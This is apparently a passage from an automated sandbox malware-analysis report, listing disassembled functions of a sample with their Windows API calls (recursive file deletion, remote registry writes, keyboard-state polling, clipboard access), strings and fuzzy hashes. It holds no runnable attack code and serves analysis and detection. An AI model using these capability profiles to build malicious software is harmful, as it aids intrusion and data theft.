FindClose.KERNEL32(00000000), ref: 00F0C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F0C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F0C844
__swprintf.LIBCMT ref: 00F0C890
__swprintf.LIBCMT ref: 00F0C8D3

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

__swprintf.LIBCMT ref: 00F0C927

Part of subcall function 00EC3698: __woutput_l.LIBCMT ref: 00EC36F1

__swprintf.LIBCMT ref: 00F0C975

Part of subcall function 00EC3698: __flsbuf.LIBCMT ref: 00EC3713
Part of subcall function 00EC3698: __flsbuf.LIBCMT ref: 00EC372B

__swprintf.LIBCMT ref: 00F0C9C4
__swprintf.LIBCMT ref: 00F0CA13
__swprintf.LIBCMT ref: 00F0CA62

Strings

%02d, xrefs: 00F0C91B, 00F0C925, 00F0C973, 00F0C9C2, 00F0CA11, 00F0CA60
%4d, xrefs: 00F0C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00F0C88A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 32d46bebb26d86a1e125f7d430672b2ae77afbf43edfef8f75af83a6e11651d8
Instruction ID: aa94e21fc9ae3ec3b3dfe6264de0a7f9ae3f8e29afa91cb079057e3a27a24144
Opcode Fuzzy Hash: 32d46bebb26d86a1e125f7d430672b2ae77afbf43edfef8f75af83a6e11651d8
Instruction Fuzzy Hash: 3EA141B1404304ABC710EFA4CD85DAFB7ECFF99700F40591DF5959A192EA34EA09CB62

Function 00F0EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00F0EFB6
_wcscmp.LIBCMT ref: 00F0EFCB
_wcscmp.LIBCMT ref: 00F0EFE2
GetFileAttributesW.KERNEL32(?), ref: 00F0EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00F0F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00F0F026
FindClose.KERNEL32(00000000), ref: 00F0F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00F0F04D
_wcscmp.LIBCMT ref: 00F0F074
_wcscmp.LIBCMT ref: 00F0F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00F0F09D
SetCurrentDirectoryW.KERNEL32(00F58920), ref: 00F0F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F0F0C5
FindClose.KERNEL32(00000000), ref: 00F0F0D2
FindClose.KERNEL32(00000000), ref: 00F0F0E4

Strings

*.*, xrefs: 00F0F048

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 1c064823307e6eb66b66886b4b3b7fa2668a056bc5648dfde2b7d10dec3d91d6
Instruction ID: 711fd258273e989754ce6d685eaf5480cd6d62201676e4ce69bc2c26b5dae0c9
Opcode Fuzzy Hash: 1c064823307e6eb66b66886b4b3b7fa2668a056bc5648dfde2b7d10dec3d91d6
Instruction Fuzzy Hash: 3831C33290121DAADB34EBB4EC49EEE77AC9F49361F104175E805E20D1DB70DA49FA61

Function 00F20857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F20953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F2F910,00000000,?,00000000,?,?), ref: 00F209C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F20A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F20A92
RegCloseKey.ADVAPI32(?), ref: 00F20DB2
RegCloseKey.ADVAPI32(00000000), ref: 00F20DBF

Strings

REG_SZ, xrefs: 00F20AD0
REG_BINARY, xrefs: 00F20D4D
REG_EXPAND_SZ, xrefs: 00F20A2F
REG_MULTI_SZ, xrefs: 00F20B7A
REG_DWORD, xrefs: 00F20C83
REG_QWORD, xrefs: 00F20D00

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ce0a79a025c97b2c64eda04bc7269273112ddf901c00160a0e56307b580ecb3c
Instruction ID: 7d2ba57829f8e9e1a2dfe656e0f9e508e7f16fd166d15d9f9cdc53c36fdbb194
Opcode Fuzzy Hash: ce0a79a025c97b2c64eda04bc7269273112ddf901c00160a0e56307b580ecb3c
Instruction Fuzzy Hash: 900238766046119FCB14EF14D841E2AB7E5EF8A320F04856CF99AAB362DB34FC45DB81

Function 00F0F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00F0F113
_wcscmp.LIBCMT ref: 00F0F128
_wcscmp.LIBCMT ref: 00F0F13F

Part of subcall function 00F04385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F043A0

FindNextFileW.KERNEL32(00000000,?), ref: 00F0F16E
FindClose.KERNEL32(00000000), ref: 00F0F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00F0F195
_wcscmp.LIBCMT ref: 00F0F1BC
_wcscmp.LIBCMT ref: 00F0F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00F0F1E5
SetCurrentDirectoryW.KERNEL32(00F58920), ref: 00F0F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F0F20D
FindClose.KERNEL32(00000000), ref: 00F0F21A
FindClose.KERNEL32(00000000), ref: 00F0F22C

Strings

*.*, xrefs: 00F0F190

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: a93399c8aa95898ce78318ea45a9008071e4dce99f7430603ddb364428ee6a7a
Instruction ID: 50c75c60970e76669f001c0730f85b77f2b12cad0051d4f941ab6376f6a2bc8c
Opcode Fuzzy Hash: a93399c8aa95898ce78318ea45a9008071e4dce99f7430603ddb364428ee6a7a
Instruction Fuzzy Hash: D1319D36900219BADB30AAA4EC49EEE77AC9F45370F144175E901E24E1DB31DE4EFA54

Function 00F0A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F0A20F
__swprintf.LIBCMT ref: 00F0A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F0A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F0A293
_memset.LIBCMT ref: 00F0A2B2
_wcsncpy.LIBCMT ref: 00F0A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F0A323
CloseHandle.KERNEL32(00000000), ref: 00F0A32E
RemoveDirectoryW.KERNEL32(?), ref: 00F0A337
CloseHandle.KERNEL32(00000000), ref: 00F0A341

Strings

\, xrefs: 00F0A247
\??\%s, xrefs: 00F0A22B
:, xrefs: 00F0A252

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b7faf2408957b1f703ebe2d2e1ccdcbc78ab855407c530f498317cb39b162d81
Instruction ID: b181bb541ae1581f9fcb685e997b74f3e702cf5e781d0746d33a677a1bbc5821
Opcode Fuzzy Hash: b7faf2408957b1f703ebe2d2e1ccdcbc78ab855407c530f498317cb39b162d81
Instruction Fuzzy Hash: F531C971900209ABDB21DFA0DC45FEB37BCEF89750F1041B6F509E2190E7719645AB25

Function 00EB66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON

Download Yara Rule

Strings

3c, xrefs: 00EB68FF
ANYCRLF), xrefs: 00EF12FB
CRLF), xrefs: 00EF12C1
UTF), xrefs: 00EF10FA
_, xrefs: 00EF1465, 00EF150C, 00EF15B4
ANY), xrefs: 00EF12DE
LF), xrefs: 00EF12A4
BSR_UNICODE), xrefs: 00EF1338
LIMIT_MATCH=, xrefs: 00EF1170
BSR_ANYCRLF), xrefs: 00EF131E
UCP), xrefs: 00EF110D
LIMIT_RECURSION=, xrefs: 00EF11FC
NO_START_OPT), xrefs: 00EF114F
NO_AUTO_POSSESS), xrefs: 00EF112E
UTF16), xrefs: 00EF10CF
CR), xrefs: 00EF1287

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
API String ID: 0-4228276721
Opcode ID: 87149eac37aa3d2755c2d72e7114aca668f01b36bf5c04d44f7df90d2600e979
Instruction ID: b1a9ceedbde4b9041e3ad10bd04934e65afa46990944ee623c9745e3b0bc2b52
Opcode Fuzzy Hash: 87149eac37aa3d2755c2d72e7114aca668f01b36bf5c04d44f7df90d2600e979
Instruction Fuzzy Hash: F8726B71E00229CBDB14CF58C8807FEB7B5EF44314F1491AAE949FB291EB349A81DB90

Function 00F0001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F00097
SetKeyboardState.USER32(?), ref: 00F00102
GetAsyncKeyState.USER32(000000A0), ref: 00F00122
GetKeyState.USER32(000000A0), ref: 00F00139
GetAsyncKeyState.USER32(000000A1), ref: 00F00168
GetKeyState.USER32(000000A1), ref: 00F00179
GetAsyncKeyState.USER32(00000011), ref: 00F001A5
GetKeyState.USER32(00000011), ref: 00F001B3
GetAsyncKeyState.USER32(00000012), ref: 00F001DC
GetKeyState.USER32(00000012), ref: 00F001EA
GetAsyncKeyState.USER32(0000005B), ref: 00F00213
GetKeyState.USER32(0000005B), ref: 00F00221

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b393090f16f4de7c0e5118fc6142614f88d043e7ea372a0d20cf02233a9682ba
Instruction ID: a47d98f9d2586787d8606835c2d39dc8fc4200d97b2f861de475722d124ffb48
Opcode Fuzzy Hash: b393090f16f4de7c0e5118fc6142614f88d043e7ea372a0d20cf02233a9682ba
Instruction Fuzzy Hash: 4651D730D0478829FB35DBA088557EABFB49F02390F08459ED9C6565C2DEA89B8CF761

Function 00F203DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F1FDAD,?,?), ref: 00F20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F204AC

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F2054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F205E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F20822
RegCloseKey.ADVAPI32(00000000), ref: 00F2082F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 1202bc29615f647c4ee435a74b2ec3fbe423014a484795d61c18ad75ffd6dc66
Instruction ID: 0eabfc4f61f17ab55065bc636759a96a4a5230f8337052495659166fff44e10f
Opcode Fuzzy Hash: 1202bc29615f647c4ee435a74b2ec3fbe423014a484795d61c18ad75ffd6dc66
Instruction Fuzzy Hash: ADE16C31604214AFCB14DF28D891E6BBBE5EF89714F04896DF84ADB262DB30ED05DB91

Function 00F183BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

CoInitialize.OLE32 ref: 00F18403
CoUninitialize.OLE32 ref: 00F1840E
CoCreateInstance.OLE32(?,00000000,00000017,00F32BEC,?), ref: 00F1846E
IIDFromString.OLE32(?,?), ref: 00F184E1
VariantInit.OLEAUT32(?), ref: 00F1857B
VariantClear.OLEAUT32(?), ref: 00F185DC

Strings

Invalid parameter, xrefs: 00F184FA
Failed to create object, xrefs: 00F18479, 00F1852F
NULL Pointer assignment, xrefs: 00F184B3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: de7983916203024acc8faff54aa7c195d727fa9bf87e8b481f81c426e5ea6717
Instruction ID: 68f66defa02c992c6a13f20892f852c6caad42d698daad5cf4c72c19641d4d39
Opcode Fuzzy Hash: de7983916203024acc8faff54aa7c195d727fa9bf87e8b481f81c426e5ea6717
Instruction Fuzzy Hash: DE61C2716083129FC710DF54C948FAAB7E9EF497A4F044419F9819B291CF70ED8AEB92

Function 00F14164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F1418B
EmptyClipboard.USER32 ref: 00F14191
GlobalAlloc.KERNEL32(00000002,?), ref: 00F141A6
CloseClipboard.USER32 ref: 00F14245

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 1eb3a45071302da69bde9a1a01bd5f97c423416cb5ceec58310da900b1e1114a
Instruction ID: af7eb8f55ae20d3f893943f7a8d651ec4d3be6deec653ef64003d924dba667e8
Opcode Fuzzy Hash: 1eb3a45071302da69bde9a1a01bd5f97c423416cb5ceec58310da900b1e1114a
Instruction Fuzzy Hash: 6821D335601218AFDB11AF60DC09B6D7BB8EF55720F108029F946EB2A1CB34BC41EB54

Function 00F037EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EA4743,?,?,00EA37AE,?), ref: 00EA4770

Part of subcall function 00F04A31: GetFileAttributesW.KERNEL32(?,00F0370B), ref: 00F04A32

FindFirstFileW.KERNEL32(?,?), ref: 00F038A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F0394B
MoveFileW.KERNEL32(?,?), ref: 00F0395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F0397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F0399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F039B9

Strings

\*.*, xrefs: 00F0384E, 00F03857, 00F0386C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 076fe234bb91c2785b5296afec9b4d7a98a342a3d9e8a97afe2f446e855c4bc6
Instruction ID: b938bd89781095c777ea6412cf48cf8b740f5c923e67a716561eca6fa4cec849
Opcode Fuzzy Hash: 076fe234bb91c2785b5296afec9b4d7a98a342a3d9e8a97afe2f446e855c4bc6
Instruction Fuzzy Hash: 6B51827180514C9ACF15EBA0CE929EDB7B9AF59310F604069E4427B1D2DB316F0DEB51

Function 00F0F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F0F440
Sleep.KERNEL32(0000000A), ref: 00F0F470
_wcscmp.LIBCMT ref: 00F0F484
_wcscmp.LIBCMT ref: 00F0F49F
FindNextFileW.KERNEL32(?,?), ref: 00F0F53D
FindClose.KERNEL32(00000000), ref: 00F0F553

Strings

*.*, xrefs: 00F0F425

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 282d1b791ecd5b891f8e7b8809ed67b965c56d32cfaa52b22ecdcc0a62a130cc
Instruction ID: 427d0a7b4dd11ee701b1a88739563e91831fbe80e6769b79423b02bec4ea76da
Opcode Fuzzy Hash: 282d1b791ecd5b891f8e7b8809ed67b965c56d32cfaa52b22ecdcc0a62a130cc
Instruction Fuzzy Hash: E2415C72D1021A9FCF24DF64DC45AFEBBB4FF09320F14446AE855A6191DB30AE49EB50

Function 00EB3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3c, xrefs: 00EB3225
_, xrefs: 00EB3322

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c$_
API String ID: 674341424-4099079164
Opcode ID: 0c2b60ffe16db52317822c6eec91f46a0cf2e45e5090c17e8257684f1c2ebe52
Instruction ID: 7735703c4c6e0d1da95d5f44c59cc4f7369ade65ddfdc87c53eb906b52e06862
Opcode Fuzzy Hash: 0c2b60ffe16db52317822c6eec91f46a0cf2e45e5090c17e8257684f1c2ebe52
Instruction Fuzzy Hash: B222A0716083419FC724DF24C881BAFB7E4EF99714F10691DF49AAB291DB71E904CB92

Function 00EB5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB58A5
_memmove.LIBCMT ref: 00EB58F5
_memmove.LIBCMT ref: 00EB595B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4b1330fb6d3bf97e4f3b07e7f9a248ebd7f7c2d49b0e64c7bdd39356c482bbb8
Instruction ID: 081f551f61765f9392ed91d01c47c1ba7365c93f27cc8c7c2b03c4aebea54984
Opcode Fuzzy Hash: 4b1330fb6d3bf97e4f3b07e7f9a248ebd7f7c2d49b0e64c7bdd39356c482bbb8
Instruction Fuzzy Hash: 37128771A00609DFDF08DFA4DA81AEEB7F5FF88300F105569E846B7291EB36A911CB50

Function 00F03B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EA4743,?,?,00EA37AE,?), ref: 00EA4770

Part of subcall function 00F04A31: GetFileAttributesW.KERNEL32(?,00F0370B), ref: 00F04A32

FindFirstFileW.KERNEL32(?,?), ref: 00F03B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F03BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F03BEA
FindClose.KERNEL32(00000000), ref: 00F03C01
FindClose.KERNEL32(00000000), ref: 00F03C0A

Strings

\*.*, xrefs: 00F03B5B

Memory Dump Source

